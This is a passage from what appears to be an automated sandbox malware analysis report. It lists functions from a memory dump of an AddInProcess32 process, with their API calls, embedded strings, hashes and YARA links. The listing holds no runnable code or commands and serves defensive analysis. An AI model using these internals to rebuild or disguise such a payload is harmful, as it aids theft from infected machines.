                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                  • String ID:
                                                                                                  • API String ID: 4218492932-0
                                                                                                  • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                  • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                  • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                  • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                  Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                  • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                  • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                  • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                  • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                  • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                  • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcpy$memset
                                                                                                  • String ID: gj
                                                                                                  • API String ID: 438689982-4203073231
                                                                                                  • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                  • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                  • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                  • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                  Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                  • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                  • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                  • memset.MSVCRT ref: 00405ABB
                                                                                                  • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                  • SetFocus.USER32(?), ref: 00405B76
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$FocusItemmemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 4281309102-0
                                                                                                  • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                  • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                  • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                  • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                  Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _snwprintfwcscat
                                                                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                  • API String ID: 384018552-4153097237
                                                                                                  • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                  • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                  • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                  • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                  Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                  • String ID: 0$6
                                                                                                  • API String ID: 2029023288-3849865405
                                                                                                  • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                  • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                  • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                  • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                  Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                  • memset.MSVCRT ref: 00405455
                                                                                                  • memset.MSVCRT ref: 0040546C
                                                                                                  • memset.MSVCRT ref: 00405483
                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$memcpy$ErrorLast
                                                                                                  • String ID: 6$\
                                                                                                  • API String ID: 404372293-1284684873
                                                                                                  • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                  • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                  • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                  • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                  Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                  • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                  • wcscat.MSVCRT ref: 0040A0E6
                                                                                                  • wcscat.MSVCRT ref: 0040A0F5
                                                                                                  • wcscpy.MSVCRT ref: 0040A107
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 1331804452-0
                                                                                                  • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                  • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                  • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                  • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                  Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                  • String ID: advapi32.dll
                                                                                                  • API String ID: 2012295524-4050573280
                                                                                                  • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                  • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                  • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                  • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                  Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                  • <%s>, xrefs: 004100A6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$_snwprintf
                                                                                                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                  • API String ID: 3473751417-2880344631
                                                                                                  • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                  • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                  • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                  • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                  Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcscat$_snwprintfmemset
                                                                                                  • String ID: %2.2X
                                                                                                  • API String ID: 2521778956-791839006
                                                                                                  • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                  • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                  • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                  • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                  Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _snwprintfwcscpy
                                                                                                  • String ID: dialog_%d$general$menu_%d$strings
                                                                                                  • API String ID: 999028693-502967061
                                                                                                  • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                  • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                  • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                  • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                  Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                    • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                    • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                  • memset.MSVCRT ref: 0040C439
                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                  • _wcsupr.MSVCRT ref: 0040C481
                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                  • memset.MSVCRT ref: 0040C4D0
                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 4131475296-0
                                                                                                  • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                  • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                  • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                  • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                  Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 004116FF
                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                    • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                  • API String ID: 2618321458-3614832568
                                                                                                  • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                  • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                  • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                  • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                  Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFilefreememset
                                                                                                  • String ID:
                                                                                                  • API String ID: 2507021081-0
                                                                                                  • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                  • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                  • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                  • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                  Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                  • malloc.MSVCRT ref: 00417524
                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                  • free.MSVCRT ref: 00417544
                                                                                                  • free.MSVCRT ref: 00417562
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 4131324427-0
                                                                                                  • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                  • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                  • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                  • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                  Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                  • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                  • free.MSVCRT ref: 0041822B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: PathTemp$free
                                                                                                  • String ID: %s\etilqs_$etilqs_
                                                                                                  • API String ID: 924794160-1420421710
                                                                                                  • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                  • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                  • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                  • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                  Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • wcscpy.MSVCRT ref: 0041477F
                                                                                                  • wcscpy.MSVCRT ref: 0041479A
                                                                                                  • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcscpy$CloseCreateFileHandle
                                                                                                  • String ID: General
                                                                                                  • API String ID: 999786162-26480598
                                                                                                  • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                  • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                  • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                  • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                  Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastMessage_snwprintf
                                                                                                  • String ID: Error$Error %d: %s
                                                                                                  • API String ID: 313946961-1552265934
                                                                                                  • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                  • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                  • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                  • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                  Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: foreign key constraint failed$new$oid$old
                                                                                                  • API String ID: 0-1953309616
                                                                                                  • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                  • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                  • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                  • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                  Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
